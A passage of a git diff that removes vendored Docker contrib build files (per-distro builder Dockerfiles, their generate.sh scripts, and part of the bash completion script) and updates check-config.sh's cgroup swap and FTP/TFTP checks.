-	echo "RUN apt-get update && apt-get install -y ${packages[*]} --no-install-recommends && rm -rf /var/lib/apt/lists/*" >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
-	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
-	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	# print build tags in alphabetical order
-	buildTags=$( echo "apparmor selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
-
-	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
-	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile
deleted file mode 100644
index 6d7e4c574b..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile
+++ /dev/null
@@ -1,16 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/deb/s390x/generate.sh"!
-#
-
-FROM s390x/ubuntu:xenial
-
-RUN apt-get update && apt-get install -y apparmor bash-completion btrfs-tools build-essential cmake curl ca-certificates debhelper dh-apparmor dh-systemd git libapparmor-dev libdevmapper-dev libltdl-dev libseccomp-dev libsqlite3-dev pkg-config libsystemd-dev vim-common --no-install-recommends && rm -rf /var/lib/apt/lists/*
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-s390x.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS apparmor pkcs11 selinux
-ENV RUNC_BUILDTAGS apparmor selinux
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md
deleted file mode 100644
index 5f2e888c7a..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md
+++ /dev/null
@@ -1,5 +0,0 @@
-# `dockercore/builder-rpm`
-
-This image's tags contain the dependencies for building Docker `.rpm`s for each of the RPM-based platforms Docker targets.
-
-To add new tags, see [`contrib/builder/rpm/amd64` in https://github.com/docker/docker](https://github.com/docker/docker/tree/master/contrib/builder/rpm/amd64), specifically the `generate.sh` script, whose usage is described in a comment at the top of the file.
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh
deleted file mode 100755
index 558f7ee0db..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh
+++ /dev/null
@@ -1,10 +0,0 @@
-#!/bin/bash
-set -e
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-set -x
-./generate.sh
-for d in */; do
-	docker build -t "dockercore/builder-rpm:$(basename "$d")" "$d"
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile
deleted file mode 100644
index 1f841631ca..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile
+++ /dev/null
@@ -1,19 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
-#
-
-FROM centos:7
-
-RUN yum groupinstall -y "Development Tools"
-RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs
-RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS seccomp selinux
-
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile
deleted file mode 100644
index af040c5c9f..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile
+++ /dev/null
@@ -1,19 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
-#
-
-FROM fedora:24
-
-RUN dnf -y upgrade
-RUN dnf install -y @development-tools fedora-packager
-RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS seccomp selinux
-
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile
deleted file mode 100644
index 98e57a9c4b..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile
+++ /dev/null
@@ -1,19 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
-#
-
-FROM fedora:25
-
-RUN dnf -y upgrade
-RUN dnf install -y @development-tools fedora-packager
-RUN dnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS seccomp selinux
-
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh
deleted file mode 100755
index 6f93afafa3..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh
+++ /dev/null
@@ -1,189 +0,0 @@
-#!/bin/bash
-set -e
-
-# usage: ./generate.sh [versions]
-#    ie: ./generate.sh
-#        to update all Dockerfiles in this directory
-#    or: ./generate.sh centos-7
-#        to only update centos-7/Dockerfile
-#    or: ./generate.sh fedora-newversion
-#        to create a new folder and a Dockerfile within it
-
-cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
-
-versions=( "$@" )
-if [ ${#versions[@]} -eq 0 ]; then
-	versions=( */ )
-fi
-versions=( "${versions[@]%/}" )
-
-for version in "${versions[@]}"; do
-	distro="${version%-*}"
-	suite="${version##*-}"
-	from="${distro}:${suite}"
-	installer=yum
-
-	if [[ "$distro" == "fedora" ]]; then
-		installer=dnf
-	fi
-	if [[ "$distro" == "photon" ]]; then
-		installer=tdnf
-	fi
-
-	mkdir -p "$version"
-	echo "$version -> FROM $from"
-	cat > "$version/Dockerfile" <<-EOF
-		#
-		# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
-		#
-
-		FROM $from
-	EOF
-
-	echo >> "$version/Dockerfile"
-
-	extraBuildTags='pkcs11'
-	runcBuildTags=
-
-	case "$from" in
-		oraclelinux:6)
-			# We need a known version of the kernel-uek-devel headers to set CGO_CPPFLAGS, so grab the UEKR4 GA version
-			# This requires using yum-config-manager from yum-utils to enable the UEKR4 yum repo
-			echo "RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4"  >> "$version/Dockerfile"
-			echo "RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek"  >> "$version/Dockerfile"
-			echo >> "$version/Dockerfile"
-			;;
-		fedora:*)
-			echo "RUN ${installer} -y upgrade" >> "$version/Dockerfile"
-			;;
-		*) ;;
-	esac
-
-	case "$from" in
-		centos:*)
-			# get "Development Tools" packages dependencies
-			echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile"
-
-			if [[ "$version" == "centos-7" ]]; then
-				echo 'RUN yum -y swap -- remove systemd-container systemd-container-libs -- install systemd systemd-libs' >> "$version/Dockerfile"
-			fi
-			;;
-		oraclelinux:*)
-			# get "Development Tools" packages and dependencies
-			# we also need yum-utils for yum-config-manager to pull the latest repo file
-			echo 'RUN yum groupinstall -y "Development Tools"' >> "$version/Dockerfile"
-			;;
-		opensuse:*)
-			# get rpm-build and curl packages and dependencies
-			echo 'RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build' >> "$version/Dockerfile"
-			;;
-		photon:*)
-			echo "RUN ${installer} install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils" >> "$version/Dockerfile"
-			;;
-		*)
-			echo "RUN ${installer} install -y @development-tools fedora-packager" >> "$version/Dockerfile"
-			;;
-	esac
-
-	packages=(
-		btrfs-progs-devel # for "btrfs/ioctl.h" (and "version.h" if possible)
-		device-mapper-devel # for "libdevmapper.h"
-		glibc-static
-		libseccomp-devel # for "seccomp.h" & "libseccomp.so"
-		libselinux-devel # for "libselinux.so"
-		libtool-ltdl-devel # for pkcs11 "ltdl.h"
-		pkgconfig # for the pkg-config command
-		selinux-policy
-		selinux-policy-devel
-		sqlite-devel # for "sqlite3.h"
-		systemd-devel # for "sd-journal.h" and libraries
-		tar # older versions of dev-tools do not have tar
-		git # required for containerd and runc clone
-		cmake # tini build
-		vim-common # tini build
-	)
-
-	case "$from" in
-		oraclelinux:7)
-			# Enable the optional repository
-			packages=( --enablerepo=ol7_optional_latest "${packages[*]}" )
-			;;
-	esac
-
-	case "$from" in
-		oraclelinux:6)
-			# doesn't use systemd, doesn't have a devel package for it
-			packages=( "${packages[@]/systemd-devel}" )
-			;;
-	esac
-
-	# opensuse & oraclelinx:6 do not have the right libseccomp libs
-	case "$from" in
-		opensuse:*|oraclelinux:6)
-			packages=( "${packages[@]/libseccomp-devel}" )
-			runcBuildTags="selinux"
-			;;
-		*)
-			extraBuildTags+=' seccomp'
-			runcBuildTags="seccomp selinux"
-			;;
-	esac
-
-	case "$from" in
-		opensuse:*)
-			packages=( "${packages[@]/btrfs-progs-devel/libbtrfs-devel}" )
-			packages=( "${packages[@]/pkgconfig/pkg-config}" )
-			packages=( "${packages[@]/vim-common/vim}" )
-			if [[ "$from" == "opensuse:13."* ]]; then
-				packages+=( systemd-rpm-macros )
-			fi
-
-			# use zypper
-			echo "RUN zypper --non-interactive install ${packages[*]}" >> "$version/Dockerfile"
-			;;
-		photon:*)
-			packages=( "${packages[@]/pkgconfig/pkg-config}" )
-			echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile"
-			;;
-		*)
-			echo "RUN ${installer} install -y ${packages[*]}" >> "$version/Dockerfile"
-			;;
-	esac
-
-	echo >> "$version/Dockerfile"
-
-
-	awk '$1 == "ENV" && $2 == "GO_VERSION" { print; exit }' ../../../../Dockerfile >> "$version/Dockerfile"
-	echo 'RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local' >> "$version/Dockerfile"
-	echo 'ENV PATH $PATH:/usr/local/go/bin' >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	echo 'ENV AUTO_GOPATH 1' >> "$version/Dockerfile"
-
-	echo >> "$version/Dockerfile"
-
-	# print build tags in alphabetical order
-	buildTags=$( echo "selinux $extraBuildTags" | xargs -n1 | sort -n | tr '\n' ' ' | sed -e 's/[[:space:]]*$//' )
-
-	echo "ENV DOCKER_BUILDTAGS $buildTags" >> "$version/Dockerfile"
-	echo "ENV RUNC_BUILDTAGS $runcBuildTags" >> "$version/Dockerfile"
-	echo >> "$version/Dockerfile"
-
-	case "$from" in
-                oraclelinux:6)
-                        # We need to set the CGO_CPPFLAGS environment to use the updated UEKR4 headers with all the userns stuff.
-                        # The ordering is very important and should not be changed.
-                        echo 'ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \'  >> "$version/Dockerfile"
-                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \'  >> "$version/Dockerfile"
-                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \'  >> "$version/Dockerfile"
-                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \'  >> "$version/Dockerfile"
-                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \'  >> "$version/Dockerfile"
-                        echo '                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include'  >> "$version/Dockerfile"
-                        echo >> "$version/Dockerfile"
-                        ;;
-                *) ;;
-        esac
-
-
-done
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile
deleted file mode 100644
index addd431508..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile
+++ /dev/null
@@ -1,18 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
-#
-
-FROM opensuse:13.2
-
-RUN zypper --non-interactive install ca-certificates* curl gzip rpm-build
-RUN zypper --non-interactive install libbtrfs-devel device-mapper-devel glibc-static  libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim systemd-rpm-macros
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS pkcs11 selinux
-ENV RUNC_BUILDTAGS selinux
-
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile
deleted file mode 100644
index c34d3046dd..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile
+++ /dev/null
@@ -1,28 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
-#
-
-FROM oraclelinux:6
-
-RUN yum install -y yum-utils && curl -o /etc/yum.repos.d/public-yum-ol6.repo http://yum.oracle.com/public-yum-ol6.repo && yum-config-manager -q --enable ol6_UEKR4
-RUN yum install -y kernel-uek-devel-4.1.12-32.el6uek
-
-RUN yum groupinstall -y "Development Tools"
-RUN yum install -y btrfs-progs-devel device-mapper-devel glibc-static  libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel  tar git cmake vim-common
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS pkcs11 selinux
-ENV RUNC_BUILDTAGS selinux
-
-ENV CGO_CPPFLAGS -D__EXPORTED_HEADERS__ \
-                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/generated/uapi \
-                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/arch/x86/include/uapi \
-                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/generated/uapi \
-                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include/uapi \
-                 -I/usr/src/kernels/4.1.12-32.el6uek.x86_64/include
-
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile
deleted file mode 100644
index 378536b647..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile
+++ /dev/null
@@ -1,18 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
-#
-
-FROM oraclelinux:7
-
-RUN yum groupinstall -y "Development Tools"
-RUN yum install -y --enablerepo=ol7_optional_latest btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkgconfig selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS seccomp selinux
-
diff --git a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile b/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile
deleted file mode 100644
index b77d573d9f..0000000000
--- a/vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile
+++ /dev/null
@@ -1,18 +0,0 @@
-#
-# THIS FILE IS AUTOGENERATED; SEE "contrib/builder/rpm/amd64/generate.sh"!
-#
-
-FROM photon:1.0
-
-RUN tdnf install -y wget curl ca-certificates gzip make rpm-build sed gcc linux-api-headers glibc-devel binutils libseccomp libltdl-devel elfutils
-RUN tdnf install -y btrfs-progs-devel device-mapper-devel glibc-static libseccomp-devel libselinux-devel libtool-ltdl-devel pkg-config selinux-policy selinux-policy-devel sqlite-devel systemd-devel tar git cmake vim-common
-
-ENV GO_VERSION 1.7.5
-RUN curl -fSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" | tar xzC /usr/local
-ENV PATH $PATH:/usr/local/go/bin
-
-ENV AUTO_GOPATH 1
-
-ENV DOCKER_BUILDTAGS pkcs11 seccomp selinux
-ENV RUNC_BUILDTAGS seccomp selinux
-
diff --git a/vendor/github.com/docker/docker/contrib/check-config.sh b/vendor/github.com/docker/docker/contrib/check-config.sh
index d07e4ce368..88eb8aa753 100755
--- a/vendor/github.com/docker/docker/contrib/check-config.sh
+++ b/vendor/github.com/docker/docker/contrib/check-config.sh
@@ -217,9 +217,13 @@ echo 'Optional Features:'
 	check_flags CGROUP_PIDS
 }
 {
+	CODE=${EXITCODE}
 	check_flags MEMCG_SWAP MEMCG_SWAP_ENABLED
-	if  is_set MEMCG_SWAP && ! is_set MEMCG_SWAP_ENABLED; then
-		echo "    $(wrap_color '(note that cgroup swap accounting is not enabled in your kernel config, you can enable it by setting boot option "swapaccount=1")' bold black)"
+	if [ -e /sys/fs/cgroup/memory/memory.memsw.limit_in_bytes ]; then
+		echo "    $(wrap_color '(cgroup swap accounting is currently enabled)' bold black)"
+		EXITCODE=${CODE}
+	elif is_set MEMCG_SWAP && ! is_set MEMCG_SWAP_ENABLED; then
+		echo "    $(wrap_color '(cgroup swap accounting is currently not enabled, you can enable it by setting boot option "swapaccount=1")' bold black)"
 	fi
 }
 {
@@ -293,6 +297,8 @@ echo '  - "'$(wrap_color 'ipvlan' blue)'":'
 check_flags IPVLAN | sed 's/^/    /'
 echo '  - "'$(wrap_color 'macvlan' blue)'":'
 check_flags MACVLAN DUMMY | sed 's/^/    /'
+echo '  - "'$(wrap_color 'ftp,tftp client in container' blue)'":'
+check_flags NF_NAT_FTP NF_CONNTRACK_FTP NF_NAT_TFTP NF_CONNTRACK_TFTP | sed 's/^/    /'
 
 # only fail if no storage drivers available
 CODE=${EXITCODE}
diff --git a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/REVIEWERS
deleted file mode 100644
index 03ee2dde3d..0000000000
--- a/vendor/github.com/docker/docker/contrib/completion/REVIEWERS
+++ /dev/null
@@ -1,2 +0,0 @@
-Tianon Gravi <admwiggin@gmail.com> (@tianon)
-Jessie Frazelle <jess@docker.com> (@jfrazelle)
diff --git a/vendor/github.com/docker/docker/contrib/completion/bash/docker b/vendor/github.com/docker/docker/contrib/completion/bash/docker
deleted file mode 100644
index 7ea5d9a9f4..0000000000
--- a/vendor/github.com/docker/docker/contrib/completion/bash/docker
+++ /dev/null
@@ -1,4282 +0,0 @@
-#!/bin/bash
-#
-# bash completion file for core docker commands
-#
-# This script provides completion of:
-#  - commands and their options
-#  - container ids and names
-#  - image repos and tags
-#  - filepaths
-#
-# To enable the completions either:
-#  - place this file in /etc/bash_completion.d
-#  or
-#  - copy this file to e.g. ~/.docker-completion.sh and add the line
-#    below to your .bashrc after bash completion features are loaded
-#    . ~/.docker-completion.sh
-#
-# Configuration:
-#
-# For several commands, the amount of completions can be configured by
-# setting environment variables.
-#
-# DOCKER_COMPLETION_SHOW_CONTAINER_IDS
-# DOCKER_COMPLETION_SHOW_NETWORK_IDS
-# DOCKER_COMPLETION_SHOW_NODE_IDS
-# DOCKER_COMPLETION_SHOW_PLUGIN_IDS
-# DOCKER_COMPLETION_SHOW_SECRET_IDS
-# DOCKER_COMPLETION_SHOW_SERVICE_IDS
-#   "no"  - Show names only (default)
-#   "yes" - Show names and ids
-#
-# You can tailor completion for the "events", "history", "inspect", "run",
-# "rmi" and "save" commands by settings the following environment
-# variables:
-#
-# DOCKER_COMPLETION_SHOW_IMAGE_IDS
-#   "none" - Show names only (default)
-#   "non-intermediate" - Show names and ids, but omit intermediate image IDs
-#   "all" - Show names and ids, including intermediate image IDs
-#
-# DOCKER_COMPLETION_SHOW_TAGS
-#   "yes" - include tags in completion options (default)
-#   "no"  - don't include tags in completion options
-
-#
-# Note:
-# Currently, the completions will not work if the docker daemon is not
-# bound to the default communication port/socket
-# If the docker daemon is using a unix socket for communication your user
-# must have access to the socket for the completions to function correctly
-#
-# Note for developers:
-# Please arrange options sorted alphabetically by long name with the short
-# options immediately following their corresponding long form.
-# This order should be applied to lists, alternatives and code blocks.
-
-__docker_previous_extglob_setting=$(shopt -p extglob)
-shopt -s extglob
-
-__docker_q() {
-	docker ${host:+-H "$host"} ${config:+--config "$config"} 2>/dev/null "$@"
-}
-
-# __docker_containers returns a list of containers. Additional options to
-# `docker ps` may be specified in order to filter the list, e.g.
-# `__docker_containers --filter status=running`
-# By default, only names are returned.
-# Set DOCKER_COMPLETION_SHOW_CONTAINER_IDS=yes to also complete IDs.
-# An optional first option `--id|--name` may be used to limit the
-# output to the IDs or names of matching items. This setting takes
-# precedence over the environment setting.
-__docker_containers() {
-	local format
-	if [ "$1" = "--id" ] ; then
-		format='{{.ID}}'
-		shift
-	elif [ "$1" = "--name" ] ; then
-		format='{{.Names}}'
-		shift
-	elif [ "${DOCKER_COMPLETION_SHOW_CONTAINER_IDS}" = yes ] ; then
-		format='{{.ID}} {{.Names}}'
-	else
-		format='{{.Names}}'
-	fi
-	__docker_q ps --format "$format" "$@"
-}
-
-# __docker_complete_containers applies completion of containers based on the current
-# value of `$cur` or the value of the optional first option `--cur`, if given.
-# Additional filters may be appended, see `__docker_containers`.
-__docker_complete_containers() {
-	local current="$cur"
-	if [ "$1" = "--cur" ] ; then
-		current="$2"
-		shift 2
-	fi
-	COMPREPLY=( $(compgen -W "$(__docker_containers "$@")" -- "$current") )
-}
-
-__docker_complete_containers_all() {
-	__docker_complete_containers "$@" --all
-}
-
-__docker_complete_containers_running() {
-	__docker_complete_containers "$@" --filter status=running
-}
-
-__docker_complete_containers_stopped() {
-	__docker_complete_containers "$@" --filter status=exited
-}
-
-__docker_complete_containers_unpauseable() {
-	__docker_complete_containers "$@" --filter status=paused
-}
-
-__docker_complete_container_names() {
-	local containers=( $(__docker_q ps -aq --no-trunc) )
-	local names=( $(__docker_q inspect --format '{{.Name}}' "${containers[@]}") )
-	names=( "${names[@]#/}" ) # trim off the leading "/" from the container names
-	COMPREPLY=( $(compgen -W "${names[*]}" -- "$cur") )
-}
-
-__docker_complete_container_ids() {
-	local containers=( $(__docker_q ps -aq) )
-	COMPREPLY=( $(compgen -W "${containers[*]}" -- "$cur") )
-}
-
-__docker_images() {
-	local images_args=""
-
-	case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in
-		all)
-			images_args="--no-trunc -a"
-			;;
-		non-intermediate)
-			images_args="--no-trunc"
-			;;
-	esac
-
-	local repo_print_command
-	if [ "${DOCKER_COMPLETION_SHOW_TAGS:-yes}" = "yes" ]; then
-		repo_print_command='print $1; print $1":"$2'
-	else
-		repo_print_command='print $1'
-	fi
-
-	local awk_script
-	case "$DOCKER_COMPLETION_SHOW_IMAGE_IDS" in
-		all|non-intermediate)
-			awk_script='NR>1 { print $3; if ($1 != "<none>") { '"$repo_print_command"' } }'
-			;;
-		none|*)
-			awk_script='NR>1 && $1 != "<none>" { '"$repo_print_command"' }'
-			;;
-	esac
-
-	__docker_q images $images_args | awk "$awk_script" | grep -v '<none>$'
-}
-
-__docker_complete_images() {
-	COMPREPLY=( $(compgen -W "$(__docker_images)" -- "$cur") )
-	__ltrim_colon_completions "$cur"
-}
-
-__docker_complete_image_repos() {
-	local repos="$(__docker_q images | awk 'NR>1 && $1 != "<none>" { print $1 }')"
-	COMPREPLY=( $(compgen -W "$repos" -- "$cur") )
-}
-
-__docker_complete_image_repos_and_tags() {
-	local reposAndTags="$(__docker_q images | awk 'NR>1 && $1 != "<none>" { print $1; print $1":"$2 }')"
-	COMPREPLY=( $(compgen -W "$reposAndTags" -- "$cur") )
-	__ltrim_colon_completions "$cur"
-}
-
-# __docker_networks returns a list of all networks. Additional options to
-# `docker network ls` may be specified in order to filter the list, e.g.
-# `__docker_networks --filter type=custom`
-# By default, only names are returned.
-# Set DOCKER_COMPLETION_SHOW_NETWORK_IDS=yes to also complete IDs.
-# An optional first option `--id|--name` may be used to limit the
-# output to the IDs or names of matching items. This setting takes
-# precedence over the environment setting.
-__docker_networks() {
-	local format
-	if [ "$1" = "--id" ] ; then
-		format='{{.ID}}'
-		shift
-	elif [ "$1" = "--name" ] ; then
-		format='{{.Name}}'
-		shift
-	elif [ "${DOCKER_COMPLETION_SHOW_NETWORK_IDS}" = yes ] ; then
-		format='{{.ID}} {{.Name}}'
-	else
-		format='{{.Name}}'
-	fi
-	__docker_q network ls --format "$format" "$@"
-}
-
-# __docker_complete_networks applies completion of networks based on the current
-# value of `$cur` or the value of the optional first option `--cur`, if given.
-# Additional filters may be appended, see `__docker_networks`.
-__docker_complete_networks() {
-	local current="$cur"
-	if [ "$1" = "--cur" ] ; then
-		current="$2"
-		shift 2
-	fi
-	COMPREPLY=( $(compgen -W "$(__docker_networks "$@")" -- "$current") )
-}
-
-__docker_complete_containers_in_network() {
-	local containers=$(__docker_q network inspect -f '{{range $i, $c := .Containers}}{{$i}} {{$c.Name}} {{end}}' "$1")
-	COMPREPLY=( $(compgen -W "$containers" -- "$cur") )
-}
-
-# __docker_volumes returns a list of all volumes. Additional options to
-# `docker volume ls` may be specified in order to filter the list, e.g.
-# `__docker_volumes --filter dangling=true`
-# Because volumes do not have IDs, this function does not distinguish between
-# IDs and names.
-__docker_volumes() {
-	__docker_q volume ls -q "$@"
-}
-
-# __docker_complete_volumes applies completion of volumes based on the current
-# value of `$cur` or the value of the optional first option `--cur`, if given.
-# Additional filters may be appended, see `__docker_volumes`.
-__docker_complete_volumes() {
-	local current="$cur"
-	if [ "$1" = "--cur" ] ; then
-		current="$2"
-		shift 2
-	fi
-	COMPREPLY=( $(compgen -W "$(__docker_volumes "$@")" -- "$current") )
-}
-
-# __docker_plugins_bundled returns a list of all plugins of a given type.
-# The type has to be specified with the mandatory option `--type`.
-# Valid types are: Network, Volume, Authorization.
-# Completions may be added or removed with `--add` and `--remove`
-# This function only deals with plugins that come bundled with Docker.
-# For plugins managed by `docker plugin`, see `__docker_plugins_installed`.
-__docker_plugins_bundled() {
-	local type add=() remove=()
-	while true ; do
-		case "$1" in
-			--type)
-				type="$2"
-				shift 2
-				;;
-			--add)
-				add+=("$2")
-				shift 2
-				;;
-			--remove)
-				remove+=("$2")
-				shift 2
-				;;
-			*)
-				break
-				;;
-		esac
-	done
-
-	local plugins=($(__docker_q info | sed -n "/^Plugins/,/^[^ ]/s/ $type: //p"))
-	for del in "${remove[@]}" ; do
-		plugins=(${plugins[@]/$del/})
-	done
-	echo "${plugins[@]} ${add[@]}"
-}
-
-# __docker_complete_plugins_bundled applies completion of plugins based on the current
-# value of `$cur` or the value of the optional first option `--cur`, if given.
-# The plugin type has to be specified with the next option `--type`.
